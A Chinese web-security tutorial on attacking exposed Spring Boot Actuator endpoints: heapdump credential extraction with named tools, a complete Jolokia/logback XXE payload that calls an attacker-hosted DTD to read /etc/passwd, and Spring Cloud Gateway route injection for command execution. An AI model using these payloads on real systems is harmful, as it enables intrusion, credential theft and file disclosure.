【web安全】actuator实战利用思路

1、前提条件

端点中存在ip地址/actuator/heapdump

2、利用过程

在github中下载以下两个工具：             https://github.com/whwlsfb/JDumpSpider

https://github.com/wyzxxz/heapdump_tool

下载后将两个jar放入同一个目录

在此处的cmd运行命令 java -jar .JDumpSpider-1.1-SNAPSHOT-full.jar heapdump > output.txt

jdumpSpider会自动提取heapdump中的敏感信息并保存进入output.txt，可以在output.txt中查询到泄露的各类数据库和系统的密码。

jdumpspider自动提取有时信息覆盖不全，想要自定义查询需要用到heapdump_tool。

运行命令java -jar .heapdump_tool.jar heapdump，选1加载所有object。等待加载完成后，输入想要搜索的关键词，即可自动搜索到相关内容。示例中搜索的是password字符串。

1、前提条件

actuator开启了jolokia端点，且jolokia/list中存在reloadByURL方法

2、利用过程

先在本地创建文件，并且在此目录的cmd输入命令python -m http.server 80，开启httpserver。

logback.xml内容如下。

<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE a [ <!ENTITY % remoteSYSTEM"http://本机ip/file.dtd">%remote;%int;]>
<a>&trick;</a>

file.dtd内容如下。

<!ENTITY % d SYSTEM"file:///etc/passwd"><!ENTITY % int"<!ENTITY trick SYSTEM ':%d;'>">

该xml的作用是定义并且引用了”remote”外部实体，强制解析器访问file.dtd文件。再通过%remote;%int;的引用链，将远程dtd文件中的 int 实体插入到本地的 XML 文件中。

file.dtd则定义了”d”实体，指向系统的passwd文件。然后又定义了一个普通实体”trick”，该实体通过 SYSTEM 机制读取了/etc/passwd 文件。

最终，在 XML 解析时，trick 实体会被替换为/etc/passwd 文件的内容，并且返回给前端。

在浏览器中访问 http://target_ip/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/本机ip!/logback.xml

发现目标ip访问了我本地的xml和file.dtd，说明进行了xml解析。

从访问页面burp的抓包中可以看见读取到的passwd文件。

1、前提条件

actuator开启了gateway端点，且spring cloud gateway版本小于3.1.1

2、利用过程

访问actuator界面，注意到有gateway这一endpoint。

访问https://目标ip/api/actuator/gateway/routes可以看到里面的路由。

创建一个test1路由，里面写一个反弹bash的命令，数据包如下。

刷新路由，尝试执行该命令。

反弹shell的命令大概率会被拦截，这里提供执行ipconfig命令并回显的方法用于验证漏洞可用于执行命令。

写一个用于执行ifconfig命令的表达式并且进行refresh，访问该路由，发现执行该命令并且回显到浏览器中，证明该漏洞存在。

植入路由后会反复触发命令，需要通过DELETE删除路由才会停止触发。

DELETE /api/actuator/gateway/routes/test1host: